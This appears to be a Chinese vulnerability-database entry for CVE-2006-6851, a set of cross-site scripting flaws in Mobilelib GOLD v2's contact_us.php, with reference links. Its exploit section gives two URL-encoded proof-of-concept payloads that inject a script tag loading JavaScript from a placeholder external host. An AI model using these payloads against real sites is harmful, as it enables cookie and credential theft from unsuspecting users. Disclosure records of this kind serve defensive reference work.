Mobilelib Gold 'contact_us.php'多个跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111895 漏洞类型 跨站脚本
发布时间 2006-12-29 更新时间 2007-01-04
CVE编号 CVE-2006-6851 CNNVD-ID CNNVD-200612-629
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/29372
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-629
|漏洞详情
ac4pMobilelibgold2的contact_us.php中存在多个跨站脚本(XSS)漏洞,远程攻击者可以通过(1)email或(2)err参数注入任意Web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/21817/info

Mobilelib GOLD is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. 

An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Mobilelib GOLD version 2 is vulnerable; other versions may also be affected.

http://www.example.com/[path]/contact_us.php?email=%20%22%3E%3Cscript%20src%3Dhttp%3A//www.example2.com/swt.js%3E%3C/script%3E http://www.example.com/[path]/contact_us.php?errr=%20%22%3E%3Cscript%20src%3Dhttp%3A//www.example2.com/swt.js%3E%3C/script%3E
|参考资料

来源:BID
名称:21817
链接:http://www.securityfocus.com/bid/21817
来源:BUGTRAQ
名称:20061229Re:XSSinscriptMobilelibGOLDv2
链接:http://www.securityfocus.com/archive/1/archive/1/455499/100/0/threaded
来源:BUGTRAQ
名称:20061228XSSinscriptMobilelibGOLDv2
链接:http://www.securityfocus.com/archive/1/archive/1/455483/100/0/threaded
来源:OSVDB
名称:34805
链接:http://www.osvdb.org/34805